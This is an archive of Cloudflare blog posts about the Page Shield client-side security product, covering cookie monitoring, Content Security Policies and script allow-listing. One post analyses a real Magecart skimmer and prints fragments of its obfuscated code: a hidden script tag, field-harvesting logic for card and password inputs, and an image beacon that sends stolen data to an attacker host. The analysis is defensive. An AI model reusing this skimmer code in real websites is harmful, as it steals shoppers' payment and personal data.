Tag Archives: Page Shield

Collect all your cookies in one jar with Page Shield Cookie Monitor

Post Syndicated from Zhiyuan Zheng original https://blog.cloudflare.com/collect-all-your-cookies-in-one-jar

Cookies are small files of information that a web server generates and sends to a web browser. For example, a cookie stored in your browser will let a website know that you are already logged in, so instead of showing you a login page, you would be taken to your account page welcoming you back.

Though cookies are very useful, they are also used for tracking and advertising, sometimes with repercussions for user privacy. Cookies are a core tool, for example, for all advertising networks. To protect users, privacy laws may require website owners to clearly specify what cookies are being used and for what purposes, and, in many cases, to obtain a user’s consent before storing those cookies in the user’s browser. A key example of this is the ePrivacy Directive.

Herein lies the problem: often website administrators, developers, or compliance team members don’t know what cookies are being used by their website. A common approach for gaining a better understanding of cookie usage is to set up a scanner bot that crawls through each page, collecting cookies along the way. However, many websites requiring authentication or additional security measures do not allow for these scans, or require custom security settings to allow the scanner bot access.

To address these issues, we developed Page Shield Cookie Monitor, which provides a full single dashboard view of all first-party cookies being used by your websites. Over the next few weeks, we are rolling out Page Shield Cookie Monitor to all paid plans, no configuration or scanners required if Page Shield is enabled.

HTTP cookies

HTTP cookies are designed to allow persistence for the stateless HTTP protocol. A basic example of cookie usage is to identify a logged-in user. The browser submits the cookie back to the website whenever you access it again, letting the website know who you are, providing you a customized experience. Cookies are implemented as HTTP headers.

Cookies can be classified as first-party or third-party.

First-party cookies are normally set by the website owner1, and are used to track state against the given website. The logged in example above falls into this category. First party cookies are normally restricted and sent to the given website only and won’t be visible by other sites.

Third-party cookies, on the other hand, are often set by large advertising networks, social networks, or other large organizations that want to track user journeys across the web (across domains). For example, some websites load advertisement objects from a different domain that may set a third-party cookie associated with that advertising network.

Cookies are used for tracking

Growing concerns around user privacy has led browsers to start blocking third-party cookies by default. Led by Firefox and Safari a few years back, Google Chrome, which currently has the largest browser market share, and whose parent company owns Google Ads, the dominant advertising network, started restricting third-party cookies beginning in January of this year.

However, this does not mean the end of tracking users for advertising purposes; the technology has advanced allowing tracking to continue based on first-party cookies. Facebook Pixel, for example, started offering to set first-party cookies alongside third-party cookies in 2018 when being embedded in a website, in order “to be more accurate in measurement and reporting”.

Scanning for cookies?

To inventory all the cookies used when your website is accessed, you can open up any modern browser’s developer console and review which cookie is being set and sent back per HTTP request. However, collecting cookies with this approach won’t be practical unless your website is rather static, containing few external snippets.

Screen capture of Chrome’s developer console listing cookies being set and sent back when visiting a website.

To resolve this, a cookie scanner can be used to automate cookie collection. Depending on your security setup, additional configurations are sometimes required in order to let the scanner bots pass through protection and/or authentication. This may open up a potential attack surface, which isn’t ideal.

Introducing Page Shield Cookie Monitor

With Page Shield enabled, all the first-party cookies, whether set by your website or by external snippets, are collected and displayed in one place, no scanner required. With the click of a button, the full list can be exported in CSV format for further inventory processing.

If you run multiple websites like a marketing website and an admin console that require different cookie strategies, you can simply filter the list based on either domain or path, under the same view. This includes the websites that require authentication such as the admin console.

Dashboard showing a table of cookies seen, including key details such as cookie name, domain and path, and which host set the cookie.

To examine a particular cookie, clicking on its name takes you to a dedicated page that includes all the cookie attributes. Furthermore, similar to Script Monitor and Connection Monitor, we collect the first seen and last seen time and pages for easier tracking of your website’s behavior.

Detailed view of a captured cookie in the dashboard, including all cookie attributes as well as under which host and path this cookie has been set.

Last but not least, we are adding one more alert type specifically for newly seen cookies. When subscribed to this alert, we will notify you through either email or webhook as soon as a new cookie is detected with all the details mentioned above. This allows you to trigger any workflow required, such as inventorying this new cookie for compliance.

How Cookie Monitor works

Let’s imagine you run an e-commerce website example.com. When a user logs in to view their ongoing orders, your website would send a header with key Set-Cookie, and value to identify each user’s login activity:

  • login_id=ABC123; Domain=.example.com

To analyze visitor behaviors, you make use of Google Analytics that requires embedding a code snippet in all web pages. This snippet will set two more cookies after the pages are loaded in the browser:

  • _ga=GA1.2; Domain=.example.com;
  • _ga_ABC=GS1.3; Domain=.example.com;

As these two cookies from Google Analytics are considered first-party given their domain attribute, they are automatically included together with the logged-in cookie sent back to your website. The final cookie sent back for a logged-in user would be Cookie: login_id=ABC123; _ga=GA1.2; _ga_ABC=GS1.3 with three cookies concatenated into one string, even though only one of them is directly consumed by your website.

If your website happens to be proxied through Cloudflare already, we will observe one Set-Cookie header with cookie name of login_id during response, while receiving three cookies back: login_id, _ga, and _ga_ABC. Comparing one cookie set with three returned cookies, the overlapping login_id cookie is then tagged as set by your website directly. The same principle applies to all the requests passing through Cloudflare, allowing us to build an overview of all the first-party cookies used by your websites.

All cookies in one jar

Inventorying all cookies set through using your websites is a first step towards protecting your users’ privacy, and Page Shield makes this step just one click away. Sign up now to be notified when Page Shield Cookie Monitor becomes available!

1Technically, a first-party cookie is a cookie scoped to the given domain only (so not cross domain). Such a cookie can also be set by a third party snippet used by the website to the given domain.

Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website

Post Syndicated from Himanshu Anand original https://blog.cloudflare.com/navigating-the-maze-of-magecart

The Cloudflare security research team reviews and evaluates scripts flagged by Cloudflare Page Shield, focusing particularly on those with low scores according to our machine learning (ML) model, as low scores indicate the model thinks they are malicious. It was during one of these routine reviews that we stumbled upon a peculiar script on a customer’s website, one that was being fetched from a zone unfamiliar to us, a new and uncharted territory in our digital map.

This script was not only obfuscated but exhibited some suspicious behavior, setting off alarm bells within our team. Its complexity and the mysterious nature piqued our curiosity, and we decided to delve deeper, to unravel the enigma of what this script was truly up to.

In our quest to decipher the script’s purpose, we geared up to dissect its layers, determined to shed light on its hidden intentions and understand the full scope of its actions.

The Infection Mechanism: A seemingly harmless HTML div element housed a piece of JavaScript, a trojan horse lying in wait.

<div style="display: none; visibility: hidden;">
<script src="//cdn.jsdelivr.at/js/sidebar.min.js"></script>
The script was the conduit for the malicious activities

The devil in the details

The script hosted at the aforementioned domain was a piece of obfuscated JavaScript, a common tactic used by attackers to hide their malicious intent from casual observation. The obfuscated code can be examined in detail through the snapshot provided by Cloudflare Radar URL Scanner.

Obfuscated script snippet:

function _0x5383(_0x411252,_0x2f6ba1){var _0x1d211f=_0x1d21();return _0x5383=function(_0x5383da,_0x5719da){_0x5383da=_0x5383da-0x101;var _0x3d97e9=_0x1d211f[_0x5383da];return _0x3d97e9;},_0x5383(_0x411252,_0x2f6ba1);}var _0x11e3ed=_0x5383;(function(_0x3920b4,_0x32875c){var _0x3147a9=_0x5383,_0x5c373e=_0x3920b4();while(!![]){try{var _0x5e0fb6=-parseInt(_0x3147a9(0x13e))/0x1*(parseInt(_0x3147a9(0x151))/0x2)+parseInt(_0x3147a9(0x168))/0x3*(parseInt(_0x3147a9(0x136))/0x4)+parseInt(_0x3147a9(0x15d))/0x5*(parseInt(_0x3147a9(0x152))/0x6)+-parseInt(_0x3147a9(0x169))/0x7*(-parseInt(_0x3147a9(0x142))/0x8)+parseInt(_0x3147a9(0x143))/0x9+-parseInt(_0x3147a9(0x14b))/0xa+-parseInt(_0x3147a9(0x150))/0xb;if(_0x5e0fb6===_0x32875c)break;else _0x5c373e['push'](_0x5c373e['shift']());}catch(_0x1f0719){_0x5c373e['push'](_0x5c373e['shift']());}}}(_0x1d21,0xbc05c));function _0x1d21(){var _0x443323=['3439548foOmOf',

The primary objective of this script was to steal Personally Identifiable Information (PII), including credit card details. The stolen data was then transmitted to a server controlled by the attackers, located at https://jsdelivr[.]at/f[.]php.

Decoding the malicious domain

Before diving deeper into the exact behaviors of a script, examining the hosted domain and its insights could already reveal valuable arguments for overall evaluation. Regarding the hosted domain cdn.jsdelivr.at used in this script:

  • It was registered on 2022-04-14.
  • It impersonates the well-known hosting service jsDelivr, which is hosted at cdn.jsdelivr.net.
  • It was registered by 1337team Limited, a company known for providing bulletproof hosting services. These services are frequently utilized in various cybercrime campaigns due to their resilience against law enforcement actions and their ability to host illicit activities without interruption.
  • Previous mentions of this hosting provider, such as in a tweet by @malwrhunterteam, highlight its involvement in cybercrime activities. This further emphasizes the reputation of 1337team Limited in the cybercriminal community and its role in facilitating malicious campaigns.

Decoding the malicious script

Data Encoding and Decoding Functions: The script uses two functions, wvnso.jzzys and wvnso.cvdqe, for encoding and decoding data. They employ Base64 and URL encoding techniques, common methods in malware to conceal the real nature of the data being sent.

var wvnso = {
  "jzzys": function (_0x5f38f3) {
    return btoa(encodeURIComponent(_0x5f38f3).replace(/%([0-9A-F]{2})/g, function (_0x7e416, _0x1cf8ee) {
      return String.fromCharCode('0x' + _0x1cf8ee);
  "cvdqe": function (_0x4fdcee) {
    return decodeURIComponent(Array.prototype.map.call(atob(_0x4fdcee), function (_0x273fb1) {
      return '%' + ('00' + _0x273fb1.charCodeAt(0x0).toString(0x10)).slice(-0x2);

Targeted Data Fields: The script is designed to identify and monitor specific input fields on the website. These fields include sensitive information like credit card numbers, names, email addresses, and other personal details. The wvnso.cwwez function maps these fields, showing that the attackers had carefully studied the website’s layout.

"cwwez": window.JSON.parse(wvnso.cvdqe("W1siZmllbGQiLCAiaWZyYW1lIiwgMCwgIm4iLCAiTnVtYmVyIl0sIFsibmFtZSIsICJmaXJzdG5hbWUiLCAwLCAiZiIsICJIb2xkZXIiXSwgWyJuYW1lIiwgImxhc3RuYW1lIiwgMCwgImwiLCAiSG9sZGVyIl0sIFsiZmllbGQiLCAiaWZyYW1lIiwgMCwgImUiLCAiRGF0ZSJdLCBbImZpZWxkIiwgImlmcmFtZSIsIDAsICJjIiwgIkNWViJdLCBbImlkIiwgImN1c3RvbWVyLWVtYWlsIiwgMCwgImVsIiwgImVtYWlsIl0sIFsibmFtZSIsICJ0ZWxlcGhvbmUiLCAwLCAicGUiLCAicGhvbmUiXSwgWyJuYW1lIiwgImNpdHkiLCAwLCAiY3kiLCAiY2l0eSJdLCBbIm5hbWUiLCAicmVnaW9uX2lkIiwgMywgInNlIiwgInN0YXRlIl0sIFsibmFtZSIsICJyZWdpb24iLCAwLCAic2UiLCAic3RhdGUiXSwgWyJuYW1lIiwgImNvdW50cnlfaWQiLCAwLCAiY3QiLCAiQ291bnRyeSJdLCBbIm5hbWUiLCAicG9zdGNvZGUiLCAwLCAienAiLCAiWmlwIl0sIFsiaWQiLCAiY3VzdG9tZXItcGFzc3dvcmQiLCAwLCAicGQiLCAicGFzc3dvcmQiXSwgWyJuYW1lIiwgWyJzdHJlZXRbMF0iLCAic3RyZWV0WzFdIiwgInN0cmVldFsyXSJdLCAwLCAiYXMiLCAiYWRkciJdXQ==")),

Data Harvesting Logic: The script uses a set of complex functions ( wvnso.uvesz,  wvnso.wsrmf, etc.) to check each targeted field for user input. When it finds the data it wants (like credit card details), it collects (“harvests”) this data and gets it ready to be sent out (“exfiltrated”).

"uvesz": function (_0x52b255) {
    for (var _0x356fbe = 0x0; _0x356fbe < wvnso.cwwez.length; _0x356fbe++) {
      var _0x25348a = wvnso.cwwez[_0x356fbe];
      if (_0x52b255.hasAttribute(_0x25348a[0x0])) {
        if (typeof _0x25348a[0x1] == "object") {
          var _0xca9068 = '';
          _0x25348a[0x1].forEach(function (_0x450919) {
            var _0x907175 = document.querySelector('[' + _0x25348a[0x0] + "=\"" + _0x450919 + "\"" + ']');
            if (_0x907175 != null && wvnso.wsrmf(_0x907175, _0x25348a[0x2]).length > 0x0) {
              _0xca9068 += wvnso.wsrmf(_0x907175, _0x25348a[0x2]) + " ";
          wvnso.krwon[_0x25348a[0x4]] = _0xca9068.trim();
        } else {
          if (_0x52b255.attributes[_0x25348a[0x0]].value == _0x25348a[0x1] && wvnso.wsrmf(_0x52b255, _0x25348a[0x2]).length > 0x0) {
            if (_0x25348a[0x3] == 'l') {
              wvnso.krwon[_0x25348a[0x4]] += " " + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
            } else {
              if (_0x25348a[0x3] == 'y') {
                wvnso.krwon[_0x25348a[0x4]] += '/' + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
              } else {
                wvnso.krwon[_0x25348a[0x4]] = wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);

Stealthy Data Exfiltration: After harvesting the data, the script sends it secretly to the attacker’s server (located at https://jsdelivr[.]at/f[.]php). This process is done in a way that mimics normal Internet traffic, making it hard to detect. It creates an Image HTML element programmatically (not displayed to the user) and sets its src attribute to a specific URL. This URL is the attacker’s server where the stolen data is sent.

"eubtc": function () {
    var _0x4b786d = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    if (wvnso.pqemy() && !(wvnso.rnhok.indexOf(_0x4b786d) != -0x1)) {
      var _0x49c81a = wvnso.spyed.createElement("IMG");
      _0x49c81a.src = wvnso.cvdqe("aHR0cHM6Ly9qc2RlbGl2ci5hdC9mLnBocA==") + '?hash=' + _0x4b786d;

Persistent Monitoring: The script keeps a constant watch on user input. This means that any data entered into the targeted fields is captured, not just when the page first loads, but continuously as long as the user is on the page.

Execution Interval: The script is set to activate its data-collecting actions at regular intervals, as shown by the window.setInterval(wvnso.bumdr, 0x1f4) function call. This ensures that it constantly checks for new user input on the site.

window.setInterval(wvnso.bumdr, 0x1f4);

Local Data Storage: Interestingly, the script uses local storage methods (wvnso.hajfd, wvnso.ijltb) to keep the collected data on the user’s device. This could be a way to prevent data loss in case there are issues with the Internet connection or to gather more data before sending it to the server.

"ijltb": function () {
    var _0x19c563 = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    window.localStorage.setItem("oybwd", _0x19c563);
  "hajfd": function () {
    var _0x1318e0 = window.localStorage.getItem("oybwd");
    if (_0x1318e0 !== null) {
      wvnso.krwon = window.JSON.parse(wvnso.cvdqe(_0x1318e0));

This JavaScript code is a sophisticated tool for stealing sensitive information from users. It’s well-crafted to avoid detection, gather detailed information, and transmit it discreetly to a remote server controlled by the attackers.

Proactive detection

Page Shield’s existing machine learning algorithm is capable of automatically detecting malicious JavaScript code. As cybercriminals evolve their attack methods, we are constantly improving our detection and defense mechanisms. An upcoming version of our ML model, an artificial neural network, has been designed to maintain high recall (i.e., identifying the many different types of malicious scripts) while also providing a low false positive rate (i.e., reducing false alerts for benign code). The new version of Page Shield’s ML automatically flagged the above script as a Magecart type attack with a very high probability. In other words, our ML correctly identified a novel attack script operating in the wild! Cloudflare customers with Page Shield enabled will soon be able to take further advantage of our latest ML’s superior protection for client-side security. Stay tuned for more details.

What you can do

The attack on a Cloudflare customer is a sobering example of the Magecart threat. It underscores the need for constant vigilance and robust client-side security measures for websites, especially those handling sensitive user data. This incident is a reminder that cybersecurity is not just about protecting data but also about safeguarding the trust and well-being of users.

We recommend the following actions to enhance security and protect against similar threats. Our comprehensive security model includes several products specifically designed to safeguard web applications and sensitive data:

  1. Implement WAF Managed Rule Product: This solution offers robust protection against known attacks by monitoring and filtering HTTP traffic between a web application and the Internet. It effectively guards against common web exploits.
  2. Deploy ML-Based WAF Attack Score: Our ML-based WAF, known as Attack Score, is specifically engineered to defend against previously unknown attacks. It uses advanced machine learning algorithms to analyze web traffic patterns and identify potential threats, providing an additional layer of security against sophisticated and emerging threats.
  3. Use Page Shield: Page Shield is designed to protect against Magecart-style attacks and browser supply chain threats. It monitors and secures third-party scripts running on your website, helping you identify malicious activity and proactively prevent client-side attacks, such as theft of sensitive customer data. This tool is crucial for preventing data breaches originating from compromised third-party vendors or scripts running in the browser.
  4. Activate Sensitive Data Detection (SDD): SDD alerts you if certain sensitive data is being exfiltrated from your website, whether due to an attack or a configuration error. This feature is essential for maintaining compliance with data protection regulations and for promptly addressing any unauthorized data leakage.


[1]: https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore
[2]: https://www.bizcommunity.com/Article/196/661/241908.html
[3]: https://nationaldailyng.com/trend-micro-teams-up-with-interpol-to-fight-african-cybercrime-networks/

Making Content Security Policies (CSPs) easy with Page Shield

Post Syndicated from Michael Tremante original http://blog.cloudflare.com/making-content-security-policies-csps-easy-with-page-shield/

Making Content Security Policies (CSPs) easy with Page Shield

Making Content Security Policies (CSPs) easy with Page Shield

Modern web applications are complex, often loading JavaScript libraries from tens of different sources and submitting data to just as many. This leads to a vast attack surface area and many attack types that hackers may leverage to target the user browser directly. Magecart, a category of supply chain attack, is a good example.

To combat this, browser vendors (Google, Microsoft, Mozilla, etc.) have agreed on a standard that allows application owners to control browser behavior from a security perspective. This standard is called Content Security Policies (CSPs). Content Security Policies are implemented by application owners as a specially formatted HTTP response header that the browser then parses and enforces. This header can be used, for example, to enforce loading of JavaScript libraries only from a specific set of URLs. CSPs are good as they reduce the attack surface, but are hard to implement and manage, especially in a fast-paced development environment.

Starting today, Page Shield, our client-side security product, supports all major CSP directives. We’ve also added better reporting, automated suggestions, and Page Shield specific user roles, making CSPs much easier to manage.

If you are a Page Shield enterprise customer, log in to your dashboard to make use of the new features immediately.

Page Shield policies

Let’s say you just built a web application. To keep it simple, you used a number of services to implement specific features: Stripe for your checkout and Zendesk for your chat system.

These two systems require you to “embed” JavaScript files in your application. Once done, these widgets will also submit data back to their respective endpoints — for example, the Zendesk servers if someone interacts with the Zendesk chat widget.

You also load a JavaScript file that you built for some simple interactions in your web application. This file is hosted directly on your server under your site’s own domain, let’s say example.com.

You know that no other files should be loaded, and with a security first mindset, you wish to enforce that only these files (and no other files!) can get executed by your users directly in the browser environment. This avoids a potential compromise to be effective as browsers will refuse to execute unwanted code.

You can achieve this by using Page Shield policies, an abstraction on top of Content Security Policies (CSPs) with the goal of making CSPs easy. This system allows you to adopt a positive security model by letting you define what is allowed, and block everything else by default.

To do this we need to follow a few simple steps. First, log in to Cloudflare and head over to the relevant zone → Security → Page Shield → Policies → Create policy. We are presented with the following page:

Making Content Security Policies (CSPs) easy with Page Shield

Insert a policy name (e.g., my website policy) and select, if needed, using our standard wirefilter syntax, where you want the policy to be applied. For example, if we only wanted the policy to be applied on our checkout pages, where there is a higher risk of data being leaked, we can select:

If incoming requests match… URI Path contains “checkout”

In the UI this would be represented like this:

Making Content Security Policies (CSPs) easy with Page Shield

This filtering allows you to focus on the portions of your site that matter most, or, at the same time, test your policies on specific subsets of your traffic.

Next, we need to define where scripts are allowed to be loaded from and where they are allowed to send data to. There are two directives we can use for this: the script-src (Scripts) directive and the connect-src (Connections) directive.

For Stripe, at time of writing, scripts will be loaded from the following URL:


This same URL is also used to submit data back to Stripes’ system. Zendesk is similar, but for simplicity we will focus on Stripe only in this example. You also load a JavaScript file from your own site, example.com mentioned earlier.

From the Add a new directive dropdown, select Scripts:

Making Content Security Policies (CSPs) easy with Page Shield

Once added, the script directive will show:

Making Content Security Policies (CSPs) easy with Page Shield

This is where the magic begins. If Page Shield has been enabled on your site, you may notice it may have already detected the JavaScript files your site is loading, and will suggest them to you as a simple list of checkboxes. No more chasing developer team members to understand what is being loaded by your site.

Building the directive becomes a simple checklist exercise. The builder does allow you to decide if you wish to allow scripts from entire domains, or drill down to specific URLs only. In a normal circumstance, you should expect to allow all detected scripts. For Stripe, the directive configuration would look like the following:

Making Content Security Policies (CSPs) easy with Page Shield

A preview of the directive is shown below the builder.

One more example: remember that you also load a script from your own site? That is being identified under the example.com entry in the list. However, loading scripts from the same source is very common and to strike a good balance between simplicity and security, CSPs allow a shortcut keyword: self, available at the top of the builder. Our final policy will look like this:

Making Content Security Policies (CSPs) easy with Page Shield

And those are the basics. Simply repeat the steps for the connect-src (Connections) directive (where data should be sent to) and deploy the policy either in LOG (for testing) or ALLOW (enforcing). Your users will be a lot safer as a result.

Better policy suggestions

The suggestions engine shown above is now a lot better, making it easier to build Page Shield policies. We’ve added full support for the connect-src (Connections) directive in addition to script-src (Scripts) directive, and we now customize the suggestions based on where you wish to deploy the policy.

So for example, if you select to deploy the policy on your checkout pages only, shown as:

If incoming requests match… URI Path contains “checkout”

In the example above, the list of suggestions will automatically update to show you suggestions for scripts or connections seen on those pages, only allowing you to minimize the size of the policy. This is important as CSPs often tend to grow very large, causing performance implications.

Additionally, the builder will try to optimize the policy further for you by allowing you to easily select the correct level of precision in your ALLOW list. For example, if you are loading hundreds of scripts from a specific destination, it will propose you to allow the hostname rather than all script URLs.

All major CSP directives are now supported

Before today, we only supported the script-src (Scripts) directive, allowing you to define where scripts are allowed to be loaded from. Starting today, we support all major directives. Note however, that we only support suggestions for script-src and connect-src. Suggestions for the other directives are on the roadmap.

The full list of supported directives with relevant keywords is shown in the table below:

Directive Smart suggestions Description
script-src Define where JavaScript files are allowed to be loaded from.
connect-src Define where data can be sent to.
default-src Default behavior to apply.
img-src Define where images are allowed to be loaded from.
style-src Define where style sheets (CSS) are allowed to be loaded from.
font-src Define where font files are allowed to be loaded from.
object-src Define where objects (HTML) are allowed to be loaded from.
media-src Define where media files are allowed to be loaded from (e.g. mp4)
child-src Define where web workers and nested browser contexts are allowed to be loaded from.
form-action Define where forms should be allowed to post data to.
worker-src Define where workers are allowed to be loaded from.
base-uri Define what URLs can be used in a document base element.
manifest-src Define which manifests can be applied.
frame-src Define what URLs can be embedded in HTML iframes.
frame-ancestors Define which parent sources can embed the given page in an HTML iframe (opposite of frame-src).

Additionally, we also support the upgrade-insecure-requests directive. This is a special keyword that will force the browser to automatically convert all HTTP URLs to HTTPs. This feature is similar to our “Always Use HTTPS”, but forces the browser to upgrade the requests rather than using our proxy to perform the similar behavior. Both features can work in conjunction.

The official Mozilla CSP documentation is a great resource for additional details on each CSP directive.

Import your existing CSP policies today

A lot of customers adopting Page Shield have asked if they could import their existing CSP policies into the product. We’ve now taken a first step to make this experience possible by allowing you to paste an existing CSP directly in the policy interface:

Making Content Security Policies (CSPs) easy with Page Shield

Once pasted and imported, the system will automatically parse all found directives into the builder allowing you to subsequently edit them as required. If your policy contains deprecated directives, or directives not currently supported, an appropriate error message will be displayed allowing you to edit before trying again.

Improved violation reporting

Once you have deployed a Page Shield policy, it is important to identify its behavior: is it implemented correctly? Did you miss something?

Coincidentally, this is another aspect that is hard to manage. CSPs allows you to define an endpoint where browsers will submit violation reports (errors). However, the volume of errors can be substantial especially for large applications, requiring a whole new set of logging pipelines and infrastructure to be implemented.

Page Shield does all this for you out of the box.

With the new support for all major directives, we now also improved violation reporting to show you which directive is causing any potential issues (the first column in the screenshot below). This is provided in the policy overview screen:

Making Content Security Policies (CSPs) easy with Page Shield

Domain insights

In this release, we also took the opportunity to improve our resource details page by adding domain insights. Domain name WHOIS info is often a very good indicator of the potential maliciousness of a JavaScript resource or connection endpoint. For example, data being sent to a newly registered domain should cause some concern. We’ve also exposed any categorisations we have available for any given domain, allowing you to more quickly review the data without having to navigate to our Security Center or Cloudflare Radar.

Making Content Security Policies (CSPs) easy with Page Shield

Page Shield user permissions

One final thing. If you only need specific team members to look at or deploy policies with Cloudflare Page Shield, this is now possible. Two new user roles have been implemented in the dashboard: Page Shield (write/read) and Page Shield (read). You can find these roles available when inviting new users (or editing existing users) to the Cloudflare dashboard.

Start using Page Shield today

Most of the features discussed in this post are only available to Page Shield enterprise add-on customers, and you can find additional details in our developer documentation. However, Page Shield is available to all users on the Pro plan and above with a limited set of functionality. Turning on Page Shield is as simple as a single click.

Head over now to the dashboard and turn it on, and let us know what you think.

Stay tuned for our next Page Shield post where we will discuss how PCI DSS 4.0 client side requirements are easy to satisfy with Page Shield.

Locking down your JavaScript: positive blocking with Page Shield policies

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/page-shield-positive-blocking-policies/

Locking down your JavaScript: positive blocking with Page Shield policies

Locking down your JavaScript: positive blocking with Page Shield policies

Web development teams are tasked with delivering feature-rich applications at lightning speeds. To help them, there are thousands of pre-built JavaScript libraries that they can integrate with little effort.

Not always, however, are these libraries backed with hardened security measures to ensure the code they provide is not tampered with by malicious actors. This ultimately leads to an increased risk of an application being compromised.

Starting today, tackling the risk of external JavaScript libraries just got easier. We are adding a new feature to our client side security solution: Page Shield policies. Using policies you can now ensure only allowed and vetted libraries are executed by your application by simply reviewing a checklist.

Client side libraries

There are more than 4,373 libraries available on cdnjs, a popular JavaScript repository, at the time of writing. These libraries provide access to pre-built functionality to build web applications. The screenshot below shows the most popular on the platform such as React, Vue.js and Bootstrap. Bootstrap alone, according to W3Techs, is used on more than 20% of all websites.

Locking down your JavaScript: positive blocking with Page Shield policies

In addition to library repositories like cdnjs, there are thousands of plugins provided directly by SaaS platforms including from names such as Google, Meta, Microsoft, and more.

According to our Page Shield data, any large enterprise application is loading AND connecting to tens if not hundreds of different destinations for analytics, payments, real user monitoring, conversion tracking, customer relationship management, and many other features that internal teams “must have”.

Script hosts
(JavaScript loaded from…)
Connection hosts
(Data sent to…)
Google Google
Facebook Facebook
Cloudflare Microsoft
Salesforce Hotjar
Prospect One OneTrust
Open JS Foundation Pinterest
Microsoft TikTok
Hotjar PayPal
hCaptcha Snapchat
Fly.io NewRelic

Ultimately, it is hard for most organizations to not rely on external JavaScript libraries.

Yet another vector for attackers

Although there are good reasons to embed external JavaScript in an application, the proliferation of client side libraries, especially from SaaS providers, has increased scrutiny from malicious actors seeking new ways to exploit web applications. A single compromised SaaS provider that offers a client side library can provide direct access to thousands of applications drastically increasing return on “hacker” investment.

Client side security issues are not new. Attacks such as “web skimming”, also referred to as “Magecart-style” when in the context of payment pages, have been around for a long time. Yet, core application security products often focus on protecting the underlying web application rather than the end user data resulting in a large attack surface that most security teams simply have no visibility on. This gap in visibility, caused by “supply chains”, led us to build Page Shield, Cloudflare’s native client-side security solution.

Although the risk of supply chain attacks is becoming widely known, they are still very much an active threat. New research is being published monthly from vendors in this space highlighting ongoing attack campaigns. The Payment Card Industry Security Standards Council has also introduced new requirements in PCI DSS 4.0* that enforce companies to have systems and processes in place to tackle client side security threats.

Page Shield itself has already been effective at warning customers of ongoing attacks on their applications, such as the screenshot below highlighting an active malicious outbound connection from a Magecart-style attack on a customer e-commerce application.

Locking down your JavaScript: positive blocking with Page Shield policies

Locking down your JavaScript: positive blocking with Page Shield policies

* PCI DSS 4.0 requirements 6.4.3 and 11.6.1 are just two examples focusing on client side security.

Reducing the attack surface

Page Shield aims to detect and alert whenever malicious activity is found within the client environment. That’s still a core focus as we improve detection capabilities further.

We are now also looking at expanding capabilities to also reduce the opportunity for an attacker to compromise an application in the first place. In other words, prevent attacks happening by reducing the attack surface available.

Today we are announcing our first major feature in this space: Page Shield policies. Here’s what it looks like:

Locking down your JavaScript: positive blocking with Page Shield policies

Positive blocking policies

By leveraging our position in the network stack as a reverse proxy, and by using Page Shield policies, you can now enforce client browsers to load and execute JavaScript libraries only from your pre-approved list of allowed sources implementing a positive security model.

This ensures that an attacker that is able to inject a script in a page, won’t be successful in compromising users, as browsers will refuse to load it. At the same time, vetted tools will run without issues.

Policies will also soon allow you to specify data destinations (connection endpoints) also enforcing not only where JavaScript files are being loaded from, but also where the browser can send data to drastically reduce the risk of “Magecart-style” attacks.

CSPs as the core mechanism

Page Shield policies are currently implemented with Content Security Policies (CSPs), a feature natively supported by all major browsers.

CSPs are specially formatted HTTP response headers that are added to HTML page loads. These headers may contain one or more directives that instruct the browser how to and what to execute in the context of the given page.

From today Page Shield policies support the script-src directive. This directive lets application owners specify “where” JavaScript files are allowed to be loaded from. Support for the connect-src directive is also being finalized which behaves similarly to script-src, but specifies where the browser is allowed to send data “to”.

Let’s take a look at a one example and assume we were opening the following web page www.example.com/index.html and the browser received a CSP header as below:

Content-Security-Policy: script-src 'self' *.example.com cdnjs.cloudflare.com https://www.google-analytics.com/analytics.js

The header instructs the browser to allow scripts (defined by the use of the script-src directive) to be loaded from the same hostname as the page itself (defined by self) as well as from any subdomain (*.example.com). It is additionally allowing any script under cdnjs and only a specific script for Google Analytics and no other scripts under the Google owned domain.

This ensures that any attacker injected script from different hosts would not be executed, drastically reducing the attack surface available.

If rather than Content-Security-Policy we had received a Content-Security-Policy-Report-Only header, the policy would not be enforced, but browsers would only send violation reports letting you know what is outside of policy.

This is useful when testing and when investigating new scripts that have been added to your application.

Additional statements are also available and supported by Page Shield within the script-src directive to block inline JavaScript (unsafe-inline) or normally unsafe function calls (unsafe-eval). These directives help prevent other attack types such as cross site scripting attacks (XSS).

Making policy management easy

CSPs, the underlying system used by Page Shield policies, are great but hard to manage. The larger the application, the more complex CSPs become while also causing a bottleneck for application development teams. This leads to CSPs becoming ineffective as security teams broaden the list of allowed hosts to the point that their purpose becomes debatable.

Making policy management easy, and ensuring they are effective, was a core goal of our design process. This led us to build a suggestions feature.

When deploying a policy, the first step is deciding “where” will the policy be applied to. Typical examples may include only your checkout flow or admin pages. This is done using wirefilter syntax, the same syntax that powers Cloudflare’s WAF.

Locking down your JavaScript: positive blocking with Page Shield policies

Once the filter is specified, using the data already collected by Page Shield, the interface will provide a list of suggested directive values, making it very easy to build the simplest and most effective policy for your application. No need to worry about syntax, the policy preview will be shown before committing.

Locking down your JavaScript: positive blocking with Page Shield policies

Finally, policies can be deployed both in “report only/log” and “enforce/allow”, letting you control and test as required.

We are currently finishing work on our alerting backend to warn you whenever we notice a spike in violation reports. This lets you easily return to the policy builder and update it with any newly seen script that may have been added by your development team.

Positive blocking policies are not enough

It is important not to forget that CSPs provide no security or malicious activity detection within the list of allowed endpoints. They are meant to reduce the likelihood of an attack happening by reducing the attack surface available. For this reason, Page Shield’s automated malicious activity detection will continue to function in the background regardless of any policy being deployed.

Secure your end user data today

All Cloudflare paid customers have access to a subset of Page Shield features today. Turning on Page Shield is as simple as clicking a button. Head over to Security > Page Shield and give it a go!

If you are an enterprise customer and are interested in Page Shield policies, reach out to your account team to get access to the full feature set.

Page Shield can now watch for malicious outbound connections made by third-party JavaScript code

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/page-shield-connection-monitor/

Page Shield can now watch for malicious outbound connections made by third-party JavaScript code

Page Shield can now watch for malicious outbound connections made by third-party JavaScript code

Page Shield can now watch for malicious outbound connections made by third-party JavaScript code

Many websites use third party JavaScript libraries to cut development time by using pre-built features. Common examples include checkout services, analytics tools, or live chat integrations. Any one of these JavaScript libraries may be sending site visitors’ data to unknown locations.

